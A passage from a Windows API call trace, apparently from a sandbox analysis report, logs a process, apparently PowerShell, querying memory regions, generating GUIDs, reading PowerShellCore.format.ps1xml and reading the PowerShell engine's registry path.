__alignment2=0x0)) returned 0x30 [0074.098] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.099] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.099] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.099] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.099] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xcb968db3, Data2=0x84ac, Data3=0x427e, Data4=([0]=0xbf, [1]=0xfb, [2]=0xd, [3]=0xf3, [4]=0x70, [5]=0x35, [6]=0xcf, [7]=0xe9))) returned 0x0 [0074.099] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x469ecb12, Data2=0xabf2, Data3=0x4ab7, Data4=([0]=0x81, [1]=0x58, [2]=0xe, [3]=0x44, [4]=0xe2, [5]=0x75, [6]=0x44, [7]=0xfe))) returned 0x0 [0074.100] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xbd0d181c, Data2=0x31c6, Data3=0x4e09, Data4=([0]=0xa8, [1]=0xbb, [2]=0xdf, [3]=0x28, [4]=0x96, [5]=0xd6, [6]=0x90, [7]=0x60))) returned 0x0 [0074.100] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x28bce811, Data2=0x3162, Data3=0x449d, Data4=([0]=0xa7, [1]=0xe4, [2]=0xbf, [3]=0xfc, [4]=0x4d, [5]=0x3e, [6]=0x2, [7]=0x15))) returned 0x0 [0074.101] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x776edbdc, Data2=0xf8b0, Data3=0x4f79, Data4=([0]=0xab, [1]=0x39, [2]=0x4e, [3]=0xa3, [4]=0xdb, [5]=0x27, [6]=0x13, [7]=0x6c))) returned 0x0 [0074.101] VirtualQuery (in: lpAddress=0x1ab910, lpBuffer=0x1ac7d0, dwLength=0x30 | out: lpBuffer=0x1ac7d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.101] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.101] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xe5ffb5ef, Data2=0x49d2, Data3=0x4d31, Data4=([0]=0xb5, [1]=0x49, [2]=0x26, [3]=0xa2, [4]=0x22, [5]=0x76, [6]=0x36, [7]=0xc9))) returned 0x0 [0074.101] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x7d780cff, Data2=0x6936, Data3=0x42d2, Data4=([0]=0x84, [1]=0xb5, [2]=0x5e, [3]=0x5, [4]=0xcf, [5]=0xc7, [6]=0xb9, [7]=0xf7))) returned 0x0 [0074.101] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x6880de53, Data2=0x93c5, Data3=0x4959, Data4=([0]=0xae, [1]=0x4b, [2]=0x99, [3]=0x61, [4]=0xb7, [5]=0x37, [6]=0xc9, [7]=0xa7))) returned 0x0 [0074.102] SetErrorMode (uMode=0x1) returned 0x1 [0074.102] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318 [0074.102] SetErrorMode (uMode=0x1) returned 0x1 [0074.102] GetFileType (hFile=0x318) returned 0x1 [0074.102] ReadFile (in: hFile=0x318, lpBuffer=0x3adb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3adb140*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.103] ReadFile (in: hFile=0x318, lpBuffer=0x3adb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3adb140*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.104] ReadFile (in: hFile=0x318, lpBuffer=0x3adb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3adb140*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.104] ReadFile (in: hFile=0x318, lpBuffer=0x3adb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3adb140*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.104] ReadFile (in: hFile=0x318, lpBuffer=0x3adb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3adb140*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.104] ReadFile (in: hFile=0x318, lpBuffer=0x3adb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3adb140*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.105] ReadFile (in: hFile=0x318, lpBuffer=0x3adb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3adb140*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.105] ReadFile (in: hFile=0x318, lpBuffer=0x3adb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3adb140*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.105] ReadFile (in: hFile=0x318, lpBuffer=0x3adb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3adb140*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.105] ReadFile (in: hFile=0x318, lpBuffer=0x3adb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3adb140*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.105] ReadFile (in: hFile=0x318, lpBuffer=0x3adb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3adb140*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.106] ReadFile (in: hFile=0x318, lpBuffer=0x3adb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3adb140*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.106] ReadFile (in: hFile=0x318, lpBuffer=0x3adb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3adb140*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.106] ReadFile (in: hFile=0x318, lpBuffer=0x3adb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3adb140*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.106] ReadFile (in: hFile=0x318, lpBuffer=0x3adb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3adb140*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.106] ReadFile (in: hFile=0x318, lpBuffer=0x3adb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3adb140*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.106] ReadFile (in: hFile=0x318, lpBuffer=0x3adb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3adb140*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.107] ReadFile (in: hFile=0x318, lpBuffer=0x3adb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3adb140*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.107] ReadFile (in: hFile=0x318, lpBuffer=0x3adb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3adb140*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.108] ReadFile (in: hFile=0x318, lpBuffer=0x3adb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3adb140*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.108] ReadFile (in: hFile=0x318, lpBuffer=0x3adb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3adb140*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.108] ReadFile (in: hFile=0x318, lpBuffer=0x3adb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3adb140*, lpNumberOfBytesRead=0x1ad0f8*=0xe67, lpOverlapped=0x0) returned 1 [0074.108] ReadFile (in: hFile=0x318, lpBuffer=0x3ada70f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3ada70f*, lpNumberOfBytesRead=0x1ad0f8*=0x0, lpOverlapped=0x0) returned 1 [0074.108] ReadFile (in: hFile=0x318, lpBuffer=0x3adb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3adb140*, lpNumberOfBytesRead=0x1ad0f8*=0x0, lpOverlapped=0x0) returned 1 [0074.109] SetErrorMode (uMode=0x1) returned 0x1 [0074.109] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad0a0 | out: lpFileInformation=0x1ad0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0074.109] SetErrorMode (uMode=0x1) returned 0x1 [0074.109] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad188 | out: phkResult=0x1ad188*=0x318) returned 0x0 [0074.109] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad10c, lpData=0x0, lpcbData=0x1ad108*=0x0 | out: lpType=0x1ad10c*=0x1, lpData=0x0, lpcbData=0x1ad108*=0x56) returned 0x0 [0074.109] CoTaskMemAlloc (cb=0x5a) returned 0x1b3cd000 [0074.109] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad0dc, lpData=0x1b3cd000, lpcbData=0x1ad0d8*=0x56 | out: lpType=0x1ad0dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad0d8*=0x56) returned 0x0 [0074.109] CoTaskMemFree (pv=0x1b3cd000) [0074.109] RegCloseKey (hKey=0x318) returned 0x0 [0074.113] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x4f69b9ba, Data2=0xf39a, Data3=0x4669, Data4=([0]=0x9a, [1]=0xe9, [2]=0xf1, [3]=0x21, [4]=0x36, [5]=0xeb, [6]=0x41, [7]=0x52))) returned 0x0 [0074.114] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x9589972d, Data2=0x63a9, Data3=0x4ad1, Data4=([0]=0x8a, [1]=0x3c, [2]=0x5e, [3]=0x90, [4]=0xf3, [5]=0xea, [6]=0xe5, [7]=0x5e))) returned 0x0 [0074.114] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xf484285d, Data2=0xc6aa, Data3=0x47a6, Data4=([0]=0x9c, [1]=0x25, [2]=0x15, [3]=0x91, [4]=0xa5, [5]=0x1c, [6]=0x52, [7]=0x2d))) returned 0x0 [0074.114] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xcfffe246, Data2=0xb084, Data3=0x4538, Data4=([0]=0x9a, [1]=0x8d, [2]=0x8f, [3]=0xb5, [4]=0xbd, [5]=0x53, [6]=0x5, [7]=0x1f))) returned 0x0 [0074.114] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xbb8e9799, Data2=0x9449, Data3=0x4d8d, Data4=([0]=0x96, [1]=0x16, [2]=0xd0, [3]=0xa, [4]=0xd3, [5]=0x6e, [6]=0x9, [7]=0xaf))) returned 0x0 [0074.115] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xf15c765c, Data2=0x7df3, Data3=0x4aeb, Data4=([0]=0x97, [1]=0xf3, [2]=0x78, [3]=0x75, [4]=0xc6, [5]=0x91, [6]=0xeb, [7]=0xb8))) returned 0x0 [0074.115] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x588df8d7, Data2=0x6bf9, Data3=0x4eb3, Data4=([0]=0x8d, [1]=0x5c, [2]=0x2d, [3]=0xe, [4]=0x56, [5]=0x88, [6]=0x1, [7]=0x7e))) returned 0x0 [0074.115] VirtualQuery (in: lpAddress=0x1abd60, lpBuffer=0x1acc20, dwLength=0x30 | out: lpBuffer=0x1acc20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.115] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xeb389545, Data2=0x1556, Data3=0x4fae, Data4=([0]=0xb4, [1]=0xaa, [2]=0xf0, [3]=0x7e, [4]=0xac, [5]=0xb2, [6]=0xf, [7]=0x2f))) returned 0x0 [0074.115] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x3016b4d6, Data2=0x7606, Data3=0x4395, Data4=([0]=0x86, [1]=0x6f, [2]=0x30, [3]=0x1, [4]=0xd0, [5]=0x3b, [6]=0x59, [7]=0xd7))) returned 0x0 [0074.115] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x25fffa0d, Data2=0xb8dd, Data3=0x4140, Data4=([0]=0xa4, [1]=0xff, [2]=0x55, [3]=0x8f, [4]=0xc3, [5]=0x65, [6]=0x6f, [7]=0xf2))) returned 0x0 [0074.115] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x272d0329, Data2=0xfbca, Data3=0x4ebc, Data4=([0]=0xad, [1]=0x23, [2]=0xb8, [3]=0x61, [4]=0xf0, [5]=0x7e, [6]=0x7b, [7]=0xdd))) returned 0x0 [0074.116] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xdd5d874e, Data2=0xf969, Data3=0x46dd, Data4=([0]=0x9e, [1]=0xa8, [2]=0x14, [3]=0xd4, [4]=0x35, [5]=0x21, [6]=0xf8, [7]=0x37))) returned 0x0 [0074.116] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x41bac4, Data2=0xe74f, Data3=0x442c, Data4=([0]=0xbc, [1]=0x4e, [2]=0xe9, [3]=0xac, [4]=0x8b, [5]=0x3b, [6]=0x7, [7]=0xad))) returned 0x0 [0074.116] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x26bb703c, Data2=0xf586, Data3=0x4a42, Data4=([0]=0xbc, [1]=0x88, [2]=0xdf, [3]=0x83, [4]=0x55, [5]=0x4d, [6]=0x2a, [7]=0xa))) returned 0x0 [0074.116] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x616680a2, Data2=0x8f0d, Data3=0x467c, Data4=([0]=0x89, [1]=0x55, [2]=0x7f, [3]=0x64, [4]=0x9c, [5]=0x4f, [6]=0xc, [7]=0x87))) returned 0x0 [0074.116] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x53d85196, Data2=0x5f41, Data3=0x4155, Data4=([0]=0x8a, [1]=0x17, [2]=0x25, [3]=0xe1, [4]=0x58, [5]=0x81, [6]=0x57, [7]=0x32))) returned 0x0 [0074.116] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x1d2c73dc, Data2=0xef5c, Data3=0x4967, Data4=([0]=0xa7, [1]=0xc4, [2]=0x32, [3]=0x49, [4]=0xf, [5]=0x84, [6]=0xe2, [7]=0xa4))) returned 0x0 [0074.116] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xf84bf1a0, Data2=0x3094, Data3=0x4c87, Data4=([0]=0xb5, [1]=0x1c, [2]=0x27, [3]=0x57, [4]=0x37, [5]=0x0, [6]=0xfb, [7]=0x5b))) returned 0x0 [0074.117] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x4b20c612, Data2=0x9386, Data3=0x4cd6, Data4=([0]=0x85, [1]=0x76, [2]=0x18, [3]=0x9b, [4]=0xe2, [5]=0x24, [6]=0x6d, [7]=0x45))) returned 0x0 [0074.117] VirtualQuery (in: lpAddress=0x1abd60, lpBuffer=0x1acc20, dwLength=0x30 | out: lpBuffer=0x1acc20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.117] VirtualQuery (in: lpAddress=0x1abd60, lpBuffer=0x1acc20, dwLength=0x30 | out: lpBuffer=0x1acc20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.117] VirtualQuery (in: lpAddress=0x1abd60, lpBuffer=0x1acc20, dwLength=0x30 | out: lpBuffer=0x1acc20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.117] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x94d945e7, Data2=0x31f3, Data3=0x4cf6, Data4=([0]=0x81, [1]=0xf5, [2]=0xf, [3]=0x7, [4]=0x54, [5]=0xf0, [6]=0x68, [7]=0xab))) returned 0x0 [0074.118] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xcdcf37bb, Data2=0x15e8, Data3=0x437f, Data4=([0]=0x96, [1]=0xb0, [2]=0xca, [3]=0x93, [4]=0x33, [5]=0xb5, [6]=0xf0, [7]=0x1))) returned 0x0 [0074.118] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xd7188a04, Data2=0xa61c, Data3=0x4687, Data4=([0]=0xaa, [1]=0x5b, [2]=0xb0, [3]=0xb1, [4]=0x1b, [5]=0x61, [6]=0x58, [7]=0xd))) returned 0x0 [0074.118] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xd2b00f80, Data2=0xed24, Data3=0x4003, Data4=([0]=0x99, [1]=0x8, [2]=0x58, [3]=0x3c, [4]=0xb8, [5]=0x3b, [6]=0x54, [7]=0x4b))) returned 0x0 [0074.118] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xb21b076d, Data2=0xb045, Data3=0x491f, Data4=([0]=0x82, [1]=0x65, [2]=0x5a, [3]=0x2d, [4]=0xd6, [5]=0x40, [6]=0x50, [7]=0x8c))) returned 0x0 [0074.118] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x9cd9e668, Data2=0x698, Data3=0x49b6, Data4=([0]=0x84, [1]=0x29, [2]=0x3e, [3]=0x45, [4]=0xa6, [5]=0xf3, [6]=0x6e, [7]=0xaf))) returned 0x0 [0074.118] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x3b8c5356, Data2=0xbe6e, Data3=0x4b1c, Data4=([0]=0xbb, [1]=0x27, [2]=0x28, [3]=0x96, [4]=0x52, [5]=0xa, [6]=0xb9, [7]=0xea))) returned 0x0 [0074.119] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x1dfd1264, Data2=0xa923, Data3=0x448c, Data4=([0]=0x83, [1]=0xf5, [2]=0xad, [3]=0x21, [4]=0x97, [5]=0xee, [6]=0x17, [7]=0x1e))) returned 0x0 [0074.119] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x77a548e3, Data2=0x14e6, Data3=0x47ec, Data4=([0]=0x85, [1]=0x66, [2]=0x1d, [3]=0xc2, [4]=0x1a, [5]=0x79, [6]=0x52, [7]=0xaa))) returned 0x0 [0074.119] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xae53ed04, Data2=0xcfce, Data3=0x4da4, Data4=([0]=0xb9, [1]=0x2c, [2]=0xaf, [3]=0x8a, [4]=0x73, [5]=0xcf, [6]=0x54, [7]=0x35))) returned 0x0 [0074.119] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xffb0e5fc, Data2=0x7d49, Data3=0x44e1, Data4=([0]=0xb2, [1]=0x11, [2]=0x7b, [3]=0x12, [4]=0x88, [5]=0xf3, [6]=0xb7, [7]=0x19))) returned 0x0 [0074.119] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x9de59da8, Data2=0xda60, Data3=0x44a7, Data4=([0]=0x83, [1]=0xe5, [2]=0x66, [3]=0xb8, [4]=0x6a, [5]=0xef, [6]=0x4a, [7]=0x43))) returned 0x0 [0074.119] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xadce57e7, Data2=0x3589, Data3=0x45c1, Data4=([0]=0xa7, [1]=0xc5, [2]=0x3f, [3]=0xc0, [4]=0xf5, [5]=0x51, [6]=0x8a, [7]=0x27))) returned 0x0 [0074.120] VirtualQuery (in: lpAddress=0x1abd60, lpBuffer=0x1acc20, dwLength=0x30 | out: lpBuffer=0x1acc20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.120] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x728a8b71, Data2=0x76f3, Data3=0x44e2, Data4=([0]=0x91, [1]=0x60, [2]=0xfb, [3]=0xfb, [4]=0x63, [5]=0xad, [6]=0xb5, [7]=0xd3))) returned 0x0 [0074.120] VirtualQuery (in: lpAddress=0x1abd60, lpBuffer=0x1acc20, dwLength=0x30 | out: lpBuffer=0x1acc20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.121] VirtualQuery (in: lpAddress=0x1abd60, lpBuffer=0x1acc20, dwLength=0x30 | out: lpBuffer=0x1acc20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.123] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x169e8963, Data2=0x92ba, Data3=0x4265, Data4=([0]=0xa4, [1]=0x51, [2]=0xcf, [3]=0x87, [4]=0xbe, [5]=0x3b, [6]=0xd4, [7]=0x93))) returned 0x0 [0074.123] VirtualQuery (in: lpAddress=0x1abd60, lpBuffer=0x1acc20, dwLength=0x30 | out: lpBuffer=0x1acc20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.123] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x1ee52bc7, Data2=0xee20, Data3=0x4a20, Data4=([0]=0x92, [1]=0xf3, [2]=0x38, [3]=0x11, [4]=0xd0, [5]=0x1a, [6]=0xec, [7]=0x49))) returned 0x0 [0074.123] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xb1ead93c, Data2=0x14f8, Data3=0x4312, Data4=([0]=0x90, [1]=0x14, [2]=0x4e, [3]=0x56, [4]=0x70, [5]=0xb2, [6]=0x98, [7]=0x1f))) returned 0x0 [0074.124] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xbc24cac9, Data2=0xf3d7, Data3=0x4606, Data4=([0]=0xba, [1]=0x7a, [2]=0x51, [3]=0xe7, [4]=0x5c, [5]=0x90, [6]=0xb9, [7]=0x4))) returned 0x0 [0074.124] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x8a630b62, Data2=0x340b, Data3=0x4454, Data4=([0]=0xb9, [1]=0x2b, [2]=0x7d, [3]=0x98, [4]=0xbf, [5]=0xf5, [6]=0xcf, [7]=0x77))) returned 0x0 [0074.124] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x997e48ea, Data2=0x8d5f, Data3=0x4caa, Data4=([0]=0xbb, [1]=0x6a, [2]=0xaa, [3]=0x65, [4]=0xe8, [5]=0x1a, [6]=0xd8, [7]=0x3f))) returned 0x0 [0074.124] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xd2e82a56, Data2=0xcf77, Data3=0x479c, Data4=([0]=0xb1, [1]=0x60, [2]=0xf8, [3]=0x66, [4]=0xd0, [5]=0x60, [6]=0xf2, [7]=0x32))) returned 0x0 [0074.124] CoCreateGuid (in: pguid=0x1ad3b0 | out: 